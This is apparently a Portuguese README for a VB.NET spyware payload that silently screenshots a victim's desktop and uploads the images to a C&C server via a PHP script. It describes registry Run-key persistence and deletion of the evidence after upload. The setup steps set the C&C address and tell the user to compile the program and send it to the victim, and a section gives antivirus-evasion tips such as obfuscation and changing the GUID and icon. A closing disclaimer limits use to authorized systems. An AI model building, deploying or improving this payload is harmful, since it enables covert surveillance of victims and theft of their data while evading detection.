Captura de tela silenciosa | Carga útil pós-exploração | VB.NET
Uma carga útil simples para fazer uma captura de tela da área de trabalho da vítima e carregá-la no C&C.
Características:
- Persistente (usando chave de execução do registro)
- Funciona em segundo plano
- Menos código, menos bugs e menos detecção;)
- Exclui a captura de tela do disco após carregá-la no C&C
- Servidor C&C em base64
- Faça upload de capturas de tela de forma organizada no C&C
- Não é necessário encaminhamento de porta! funciona com um único arquivo php
- [TODO] Informações da Máquina
- [TODO] Criptografia
- [TODO] Definir intervalo remotamente de C&C
Instalação e uso:
- Clone este repositório.
- Um webhosting que eu recomendo namecheap
- Vá para sua pasta public_html e crie um novo arquivo PHP e coloque o código abaixo nele
- Abra o projeto no Visual Studio e edite a variável abaixo no código-fonte
Dim server As String = BaseDecode1("your server address here in base64 encoded")
- e edite esta variável abaixo também
Dim php As String = "yourphpfilename.php?" & "folder="
- Basta compilá-lo e enviá-lo para a vítima, só isso !!
Conselhos de um milhão de dólares ;)
Para evitar a detecção de antivírus
- Alterar o ícone do aplicativo
- Gerar novo GUID
- Muda todas as variáveis
- Ofuscar o código usando Obfuscar
- Alterar as informações da montagem
Doação:
Se esta ferramenta foi útil para você, fique à vontade para me agradecer comprando um café para mim :)
Isenção de responsabilidade:
Esta ferramenta deve ser usada apenas em sistemas autorizados. Qualquer uso não autorizado desta ferramenta sem permissão explícita é ilegal.
Licença:
LICENÇA PÚBLICA GERAL GNU
